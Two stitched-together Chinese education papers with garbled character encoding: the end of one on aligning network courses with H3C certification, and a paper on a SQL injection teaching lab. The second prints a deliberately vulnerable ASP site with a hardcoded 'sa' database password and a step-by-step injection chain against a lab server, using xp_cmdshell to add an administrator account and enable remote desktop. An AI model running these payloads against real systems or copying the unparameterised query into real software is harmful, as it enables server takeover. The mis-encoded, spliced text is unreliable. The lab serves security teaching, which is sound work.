崗位逆推認(rèn)證品牌 網(wǎng)絡(luò)技術(shù)的認(rèn)證名目繁多,選擇何種證書是“課證融合”教學(xué)改革首先需處理的問題��,也是決定“課證融合”成敗的首要問題��?����!皪徫荒嫱品ā本唧w如下:首先根據(jù)本專業(yè)對應(yīng)的就職崗位(如網(wǎng)絡(luò)管理員),由勞動力市場圈定此類崗位對應(yīng)的有公信力的認(rèn)證品牌及合適的認(rèn)證級別�,如此逆推并遴選出來的認(rèn)證可直指就業(yè)��,學(xué)生及社會認(rèn)可度較高����。另外,在上述圈定出的相關(guān)證書中,還應(yīng)考慮到認(rèn)證費(fèi)用的因素�,如思科認(rèn)證雖然在網(wǎng)絡(luò)行業(yè)內(nèi)被普遍認(rèn)可��,但因其價(jià)格較高,成為該項(xiàng)認(rèn)證在高職院校推廣“課證融合”的“瓶頸”。經(jīng)反復(fù)權(quán)衡�����,我們選擇了H3C系列認(rèn)證�。一則H3C公司作為網(wǎng)絡(luò)設(shè)備的著名品牌,其產(chǎn)品在國內(nèi)占據(jù)了可觀的市場份額,其廣泛的銷售及合作伙伴要求其從業(yè)人員具有相關(guān)資格證書。且H3C認(rèn)證是通過國際認(rèn)證機(jī)構(gòu)向全球核發(fā)認(rèn)證,運(yùn)作嚴(yán)謹(jǐn)規(guī)范��,具有較強(qiáng)的公信力�����。學(xué)生若能通過此認(rèn)證�,將可為其提供一個(gè)良好的就業(yè)平臺�。二則按照H3C公司的相關(guān)規(guī)定,設(shè)立H3C網(wǎng)絡(luò)學(xué)院的院校�����,其學(xué)生可以以優(yōu)惠的價(jià)格申請認(rèn)證���,此舉大受學(xué)生歡迎�。三則H3C網(wǎng)絡(luò)學(xué)院體系完善,配套教材及師資培訓(xùn)機(jī)制也較為健全,可為“課證融合”的進(jìn)一步發(fā)展奠定堅(jiān)實(shí)基礎(chǔ)�。綜上所述�,在確定職業(yè)資格認(rèn)證時(shí)�,應(yīng)選擇行業(yè)普遍認(rèn)同的、主流的認(rèn)證,盡量選擇知名企業(yè)����,利用企業(yè)的品牌效應(yīng),提高證書的含金量�����。另外要兼顧學(xué)生的實(shí)際接受水平�,因地制宜,最終選擇出性價(jià)比較高的認(rèn)證品牌���。
三元素共促課證融合 從平面化的資格認(rèn)證到過程化的課程建設(shè),需要“雙師隊(duì)伍�����、雙證教材、實(shí)訓(xùn)基地”三元素共同促進(jìn)��,方能搭建起“課程”與“證書”間的互連橋梁(如上頁圖1所示)�,最終實(shí)現(xiàn)“課”與“證”二者的無縫對接。
1.“雙師”隊(duì)伍���。要落實(shí)“課證融合”,應(yīng)首先培養(yǎng)一支“雙師”隊(duì)伍��。此處的“雙師”有雙重涵義:(1)從教學(xué)管理角度看�����,應(yīng)調(diào)整“雙師”結(jié)構(gòu)比例����?�?纱罅科刚埿袠I(yè)企業(yè)的技術(shù)專家到學(xué)校擔(dān)任兼職教師�,加大兼職教師的比例�����,逐步形成實(shí)踐技能課程主要由具有高技能水平的兼職教師講授的機(jī)制。(2)從教師個(gè)人角度看�,應(yīng)注意鍛造教師個(gè)人的“雙師”素質(zhì)�。學(xué)校的大部分在職教師是具有扎實(shí)專業(yè)理論的學(xué)術(shù)型教師��,但企業(yè)實(shí)踐經(jīng)驗(yàn)較少�����,需要鼓勵其到企業(yè)參加頂崗實(shí)踐,直接參與實(shí)際工程項(xiàng)目的實(shí)施和技術(shù)開發(fā)工作����,豐富其工程經(jīng)驗(yàn)�;而對于實(shí)踐能力強(qiáng)的兼職教師而言�,則應(yīng)建議其盡快熟練掌握各種教學(xué)方法和教學(xué)手段,洞悉教育心理及規(guī)律�����,提高教學(xué)藝術(shù)水平�����。需要指出的是����,有些高職院校一味地增加兼職教師數(shù)量而忽視專職教師“雙師”素質(zhì)建設(shè)的做法是不足取的����。根據(jù)我國現(xiàn)有體制,兼職教師主要供職于所在企業(yè)�,平時(shí)項(xiàng)目多�,任務(wù)重���,很難抽出大量的時(shí)間和精力投入學(xué)校的課程建設(shè)中�����。所以,“課證融合”教學(xué)團(tuán)隊(duì)的主力軍仍是專職教師。專職教師提高自身“雙師”素質(zhì)的具體途徑有:(1)校內(nèi)取經(jīng)����。利用輔助所在學(xué)校兼職教師進(jìn)行教學(xué)的機(jī)會���,向兼職教師虛心求教����,學(xué)習(xí)取經(jīng)�����。(2)職業(yè)認(rèn)證���。通過考取行業(yè)高級從業(yè)資格認(rèn)證��,熟悉職業(yè)崗位能力要求及職業(yè)資格任職標(biāo)準(zhǔn)�����。(3)項(xiàng)目參與。利用寒暑假或在爭取到學(xué)校政策支持后��,赴相關(guān)行業(yè)的公司進(jìn)行為期半年以上的掛職鍛煉��,或到校企合作單位參加實(shí)際項(xiàng)目���,獲得第一手的項(xiàng)目案例資料����,全面了解行業(yè)動態(tài)及工作流程���。
2.雙證教材�?!半p證”教材不同于社會認(rèn)證教材,也不同于傳統(tǒng)的高職教材����,應(yīng)是能同時(shí)滿足高職學(xué)歷教育和職業(yè)資格認(rèn)證雙重需求的教材���。其特征應(yīng)以職業(yè)性內(nèi)容為主��,以學(xué)術(shù)性內(nèi)容為輔,以任務(wù)引領(lǐng)為出發(fā)點(diǎn),強(qiáng)調(diào)職業(yè)能力的培養(yǎng)���,還需要綜合考慮多方面的因素,如知識與應(yīng)用結(jié)合、學(xué)時(shí)數(shù)、學(xué)生接受能力等��。筆者結(jié)合我院網(wǎng)絡(luò)專業(yè)的實(shí)際情況�����,以H3C網(wǎng)絡(luò)學(xué)院教材為藍(lán)本�����,采用任務(wù)驅(qū)動模式自行編寫了對應(yīng)的校本教材和講義,以典型項(xiàng)目案例為任務(wù)切入點(diǎn),在完成工作任務(wù)的過程中介紹知識�����,將教學(xué)大綱�、教學(xué)內(nèi)容、教法�����、教案融為一體��,成為“四位一體”的教材。這樣的教材簡明實(shí)用��,可降低學(xué)生學(xué)習(xí)的難度�,提高學(xué)生學(xué)習(xí)的興趣,貼近我校學(xué)生實(shí)際�����。當(dāng)然�,“雙證”教材的編撰工作還應(yīng)實(shí)時(shí)跟蹤企業(yè),吸取行業(yè)專家的建議���,不斷改善校本教材,與時(shí)俱進(jìn)�,以適合行業(yè)發(fā)展需要�。
3.實(shí)訓(xùn)基地����。實(shí)訓(xùn)基地是“課證融合”實(shí)訓(xùn)教學(xué)的重要保障,實(shí)訓(xùn)基地建設(shè)的好壞直接影響到實(shí)踐教學(xué)的質(zhì)量和效果�。根據(jù)網(wǎng)絡(luò)技術(shù)類崗位要求�����,應(yīng)建設(shè)“學(xué)做合一��、工作與實(shí)訓(xùn)合一、教學(xué)與服務(wù)合一”的校內(nèi)生產(chǎn)性實(shí)訓(xùn)基地和緊密型校外實(shí)習(xí)基地����。校方應(yīng)主動聯(lián)系知名企業(yè)����,本著“工學(xué)結(jié)合�����、優(yōu)勢互補(bǔ)、資源共享����、互惠雙贏”的原則�����,爭取與之合建共享式實(shí)訓(xùn)教學(xué)基地。在校內(nèi)實(shí)訓(xùn)基地運(yùn)行過程中��,要探索教師與工程人員的融通���、教學(xué)實(shí)訓(xùn)與項(xiàng)目過程的結(jié)合����,使實(shí)訓(xùn)基地產(chǎn)生自我造血功能,進(jìn)而深化以工作過程導(dǎo)向的課程體系改革��,促進(jìn)“雙師”結(jié)構(gòu)教學(xué)團(tuán)隊(duì)建設(shè)��。另外��,校方應(yīng)拓寬校外實(shí)訓(xùn)基地的建設(shè)渠道,開發(fā)校外實(shí)訓(xùn)基地的多功能和多用途�����,建立多類型實(shí)訓(xùn)基地����,實(shí)現(xiàn)校內(nèi)外實(shí)訓(xùn)基地的緊密銜接。比如�,通過不定期召開由校企雙方主要負(fù)責(zé)人參加的校外頂崗實(shí)訓(xùn)基地工作協(xié)調(diào)會�����,完善校外基地實(shí)訓(xùn)過程管理的制度化建設(shè)��,改變校外實(shí)訓(xùn)“放羊式”的狀況��。通過豐富的實(shí)訓(xùn)實(shí)習(xí)環(huán)節(jié),使學(xué)生在項(xiàng)目實(shí)踐中產(chǎn)生豐富的感性認(rèn)知,促進(jìn)對相關(guān)應(yīng)用操作類認(rèn)證考題的深入理解和熟練掌握�����。
實(shí)踐證明���,上述“課證融合”模式的教學(xué)改革工作已初見成效�����,學(xué)生就業(yè)競爭力明顯增強(qiáng)�,但高職網(wǎng)絡(luò)專業(yè)“課證融合”的教學(xué)改革仍屬初級階段�����,筆者提出的某些方式和方法仍需進(jìn)一步深入論證和完善�。
參考文獻(xiàn):
[1]章安平.基于職業(yè)導(dǎo)向的“課證融合”人才培養(yǎng)模式研究與實(shí)踐[M].北京:高等教育出版社��,2009.
[2]高林��,許遠(yuǎn)���,張方.職業(yè)院?����!半p證書”教學(xué)工作的研究——關(guān)于職業(yè)技術(shù)教育教學(xué)改革的思考[J].中國職業(yè)技術(shù)教育�����,2006(5).
[3]姜大源.職業(yè)教育學(xué)研究新論[M].北京:教育科學(xué)出版社��,2008.
作者簡介:
李益(1974—),女,浙江嵊州人��,碩士��,北京政法職業(yè)學(xué)院講師���,研究方向?yàn)橛?jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)集成�、計(jì)算機(jī)網(wǎng)絡(luò)安全�����。
第12篇
關(guān)鍵詞:高職院校���;SQL注入攻擊�;實(shí)驗(yàn)環(huán)境�;網(wǎng)絡(luò)安全
中圖分類號:G712 文獻(xiàn)標(biāo)識碼:A 文章編號:1672-5727(2013)12-0168-03
研究意義
SQL注入攻擊是黑客攻擊最常用的手段之一,其危害極大����。一些不具備很多網(wǎng)絡(luò)安全技術(shù)的“腳本小子”�,使用一些傻瓜式SQL注入攻擊工具���,就可能攻陷網(wǎng)站���,進(jìn)而控制服務(wù)器�。
高職院校的《網(wǎng)絡(luò)安全與防范》課程,具有培養(yǎng)學(xué)生掌握較高網(wǎng)絡(luò)安全防范技能的任務(wù)。因此,必須使學(xué)生掌握好SQL注入攻擊的防范措施�。而為了真正掌握SQL注入攻擊的防范措施��,又必須透徹理解SQL注入攻擊的原理和具體實(shí)施步驟���。經(jīng)驗(yàn)表明�,這是一個(gè)教學(xué)難點(diǎn),因?yàn)樗枰臉?gòu)造SQL語句����,來完成信息的查詢�、語句的執(zhí)行等���。
我們開展了一項(xiàng)教學(xué)改革�,旨在提高《網(wǎng)絡(luò)安全與防范》課程的教學(xué)效果。該教學(xué)改革中的一項(xiàng)內(nèi)容���,就是研究如何更好地開展SQL注入攻擊的教學(xué)。我們認(rèn)為����,如果能夠搭建一個(gè)簡單的具有SQL注入漏洞的動態(tài)網(wǎng)站����,讓學(xué)生對這個(gè)網(wǎng)站進(jìn)行模擬攻擊����,對于學(xué)生更好地掌握SQL注入攻擊的原理和具體實(shí)施步驟具有很大好處,也能讓他們更好地掌握相應(yīng)的安全防范措施��。
SQL注入攻擊實(shí)驗(yàn)環(huán)境的搭建
我們使用VMware WorkStation虛擬機(jī)軟件安裝了兩臺虛擬機(jī)���,一臺虛擬機(jī)安裝的是Windows Server 2003操作系統(tǒng)���,用于模擬被攻擊的服務(wù)器,IP地址為192.168.248.132���;另一臺虛擬機(jī)安裝的是Windows XP操作系統(tǒng)�,用于模擬黑客使用的攻擊機(jī),IP地址為192.168.248.133��。在Windows Server 2003虛擬機(jī)上���,搭建了一個(gè)使用ASP+SQL Server 2000開發(fā)的簡單的動態(tài)網(wǎng)站���。我們設(shè)計(jì)該動態(tài)網(wǎng)站的思路是:該網(wǎng)站具有SQL注入漏洞�,能滿足SQL注入攻擊的實(shí)驗(yàn)要求;該網(wǎng)站應(yīng)該盡量簡單�,以便于學(xué)生理解�����、分析和掌握。
按照以上設(shè)計(jì)思路��,我們開發(fā)了一個(gè)簡單的名為testweb的動態(tài)網(wǎng)站�。該動態(tài)網(wǎng)站需要訪問一個(gè)名為testweb的數(shù)據(jù)庫,該數(shù)據(jù)庫包含一個(gè)表:tblNews�����。tblNews用來保存新聞的標(biāo)題和內(nèi)容��,初始時(shí)在這個(gè)表中輸入了一些測試用的數(shù)據(jù)�����。它的具體結(jié)構(gòu)如表1所示。
該網(wǎng)站包括以下三個(gè)頁面:conn.asp��、news.asp�、displayNews.asp。其中conn.asp用于保存與SQL Server 2000數(shù)據(jù)庫服務(wù)器的連接信息���;news.asp用于讀取數(shù)據(jù)庫中的新聞記錄,顯示所有新聞的標(biāo)題�����,并且將這些標(biāo)題以超鏈接的形式顯示�。當(dāng)單擊某個(gè)新聞的標(biāo)題后����,即可以進(jìn)入形如displayNews.asp?id=xxx的頁面,看到新聞的具體內(nèi)容(其中“xxx”表示某條新聞在tblNews表中ID字段的值)。設(shè)置該網(wǎng)站的默認(rèn)頁面為news.asp。
conn.asp的代碼如下所示:
Const SqlDatabaseName = "testweb"
Const SqlPassword = "michaeljordan"
Const SqlUsername = "sa"
Const SqlLocalName = "(local)"
dim ConnStr
ConnStr = "Provider = Sqloledb���;User ID = " & SqlUsername & ";Password = " & SqlPassword & ";Initial Catalog = " & SqlDatabaseName & "�����;Data Source = " & SqlLocalName & "�;"
news.asp的代碼如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim strSql
strSql="select * from tblNews"
dim rs
set rs=conn.Execute(strSql)
dim newsID
response.Write("")
response.Write("")
response.Write("")
while not rs.EOF
response.Write("")
response.Write("")
newsID=rs("ID")
response.Write(" " & rs("title")& " ")
response.Write("")
response.Write("")
rs.MoveNext
wend
response.Write("")
response.Write("var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-22575914-1']);_gaq.push(['_setDomainName', '']);_gaq.push(['_trackPageview']);(function () {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'ssl' : 'www') + '/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();var _userid = '';var _siteid =75;var _istoken = 1;var _model = 'Model03'; WebPageSpeed =2828; UrchinTrack();")
response.Write("")
rs.close()
conn.close
set rs=nothing
set conn=nothing
%>
displayNews.asp的代碼如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim newsID
newsID=request("id")
dim strSql
strSql="select * from tblNews where ID=" & newsID
dim rs
set rs=conn.Execute(strSql)
response.Write(rs("content"))
rs.close()
conn.close
set rs=nothing
set conn=nothing
%
從以上三個(gè)頁面的具體代碼可以看出,我們所設(shè)計(jì)的動態(tài)網(wǎng)站具有簡單���,易于理解、分析和掌握的優(yōu)點(diǎn)���。
同時(shí)頁面displayNews.asp有SQL注入漏洞,可以滿足SQL注入攻擊的實(shí)訓(xùn)需要,其具有SQL注入漏洞的具體語句為:strSql="select * from tblNews where ID=" & newsID�,該語句根據(jù)某條新聞的ID查詢tblNews表的內(nèi)容���。我們可以在形如displayNews.asp���?id=xxx的地址后面加入精心構(gòu)造的語句��,從而執(zhí)行特定的SQL語句,控制服務(wù)器。
SQL注入攻擊實(shí)驗(yàn)環(huán)境的使用
如上所述���,我們開發(fā)的動態(tài)網(wǎng)站testweb具有SQL注入漏洞,下面我們通過具體的入侵步驟來展示該SQL注入攻擊實(shí)驗(yàn)環(huán)境的使用。(以下攻擊步驟參考了相關(guān)網(wǎng)絡(luò)安全書籍的內(nèi)容。)
(一)判斷網(wǎng)站是否有SQL注入漏洞
可以通過在displayNews.asp���?id=1后加上“’”���、“ and 1=1”和“ and 1=2”等方法來判斷網(wǎng)站是否有SQL注入漏洞���。如在地址欄輸入:http://192.168.248.132/testweb/displayNews.asp?id=1’ (1)
頁面返回如下錯誤信息:
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
字符串 '' 之前有未閉合的引號��。
/testweb/displayNews.asp�,行 13
從以上提示信息可以看出,數(shù)據(jù)庫服務(wù)器為SQL Server��。(1)的原理是:正常的SQL語句為select * from tblNews where ID=1����,而(1)導(dǎo)致SQL語句成為:select * from tblNews where ID=1’,這樣會使得單引號沒有閉合而出錯����。
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp��?id=1 and 1=1 (2)
返回正常頁面。而在地址欄輸入:http://192.168.248.132/testweb/displayNews.asp?id=1 and 1=2
(3)
返回的錯誤信息是:
ADODB.Field 錯誤 '80020009'
BOF 或 EOF 中有一個(gè)是“真”���,或者當(dāng)前的記錄已被刪除,所需的操作要求一個(gè)當(dāng)前的記錄。
/testweb/displayNews.asp��,行 0
(2)導(dǎo)致SQL語句成為:select * from tblNews where ID=1 and 1=1����,因?yàn)?=1為永真式,所以不影響原來的查詢結(jié)果,返回正常頁面�����。而(3)導(dǎo)致SQL語句成為:select * from tblNews where ID=1 and 1=2����,因?yàn)?=2為永假式,所以查詢結(jié)果為空����,而程序中沒有對此進(jìn)行處理,所以導(dǎo)致出現(xiàn)錯誤提示信息���。
通過以上測試,可以明確地知道網(wǎng)站存在SQL注入漏洞�����,而且數(shù)據(jù)庫服務(wù)器為SQL Server����。
(二)查找是否有xp_cmdshell擴(kuò)展存儲過程
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=
1 and exists(select * from master.dbo.sysobjects where name=’xp_
cmdshell’)
頁面返回正常���,從而知道m(xù)aster.dbo.sysobjects表中存在擴(kuò)展過程xp_cmdshell。通過執(zhí)行xp_cmdshell存儲過程可以實(shí)現(xiàn)添加用戶����、將用戶添加到管理員組��、開啟遠(yuǎn)程終端連接等許多操作。
(三)通過xp_cmdshell添加系統(tǒng)管理員賬戶
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp�����?id=
1��;exec master..xp_cmdshell ‘net user test test/add’ (4)
頁面返回正常�。執(zhí)行該語句后��,可以添加一個(gè)名為test����,密碼也為test的賬戶����。(4)的原理是:通過xp_cmdshell擴(kuò)展存儲過程�,執(zhí)行net user命令,實(shí)現(xiàn)添加賬戶的操作。
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp����?id=1�����;exec master..xp_cmdshell ‘net localgroup administrators test /add’
頁面返回正常��。執(zhí)行該語句后,可以將賬戶test添加到系統(tǒng)管理員組�����。
(四)開啟目標(biāo)計(jì)算機(jī)的遠(yuǎn)程終端連接
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp��?id=
1�;exec master..xp_cmdshell ‘reg add “HKLM\System\CurrentControl-
Set\Control\Terminal Server”/v fDeny
TSConnections/t REG_DWORD /d 0/f’ (5)
頁面返回正常��。執(zhí)行完后���,可以開啟目標(biāo)計(jì)算機(jī)的遠(yuǎn)程終端連接�����。(5)的原理是:通過xp_cmdshell擴(kuò)展存儲過程,執(zhí)行reg add語句�����,完成修改注冊表�,開啟遠(yuǎn)程終端連接的操作���。執(zhí)行完以上步驟之后�,即可以使用新建的test賬號遠(yuǎn)程登錄目標(biāo)計(jì)算機(jī)192.168.248.132。
討論
為了使學(xué)生掌握SQL注入攻擊的原理���、具體實(shí)施步驟和相應(yīng)的防范措施,必須搭建實(shí)驗(yàn)環(huán)境讓他們演練SQL注入攻擊的實(shí)施步驟���。為此,我們搭建了一個(gè)ASP+SQL Server 2000環(huán)境下的SQL Server注入攻擊實(shí)驗(yàn)環(huán)境。我們沒有使用Dvbbs等現(xiàn)成的動態(tài)網(wǎng)站�����,因?yàn)檫@些動態(tài)網(wǎng)站功能較齊全�����,但代碼很復(fù)雜����,不利于初學(xué)者理解��、分析和掌握�����。我們設(shè)計(jì)的動態(tài)網(wǎng)站具有簡單,易于學(xué)生理解�、分析和掌握的優(yōu)點(diǎn)����。我們演示了在該實(shí)驗(yàn)環(huán)境中進(jìn)行SQL注入攻擊���,判斷是否存在SQL注入漏洞�,判斷數(shù)據(jù)庫服務(wù)器是否支持xp_cmdshell擴(kuò)展過程���,使用xp_cmdshell添加系統(tǒng)管理員賬號����、開啟遠(yuǎn)程終端連接、使用攻擊機(jī)遠(yuǎn)程登錄目標(biāo)計(jì)算機(jī)等操作�。這表明使用我們搭建的簡單的SQL注入攻擊實(shí)驗(yàn)環(huán)境��,可以方便地進(jìn)行SQL注入攻擊演練。這對提高學(xué)生的學(xué)習(xí)興趣���,掌握SQL注入攻擊的原理和具體的實(shí)施步驟,提高網(wǎng)絡(luò)安全防護(hù)意識等都具有很大的好處��。
同時(shí)���,利用該實(shí)驗(yàn)環(huán)境,或者對該實(shí)驗(yàn)環(huán)境稍微進(jìn)行擴(kuò)展����,我們還可以進(jìn)行更多的SQL注入攻擊演練����,如猜解數(shù)據(jù)庫�����、表����、字段的數(shù)目�����、字段的名稱、字段的內(nèi)容等等��。
我們的教學(xué)經(jīng)驗(yàn)表明�����,通過使用這個(gè)簡單的實(shí)驗(yàn)環(huán)境��,教學(xué)效果能得到明顯的提升。
參考文獻(xiàn):
[1]肖遙.大中型網(wǎng)絡(luò)入侵要案直擊與防御[M].北京:電子工業(yè)出版社��,2011.
[2]朱錫華���,劉月鏵���,侯偉.暗戰(zhàn)亮劍——黑客滲透與防御全程實(shí)錄[M].北京:人民郵電出版社����,2010.
[3]武新華,陳艷艷�����,王英英.矛與盾:黑客攻防與腳本編程[M].北京:機(jī)械工業(yè)出版社�,2010.
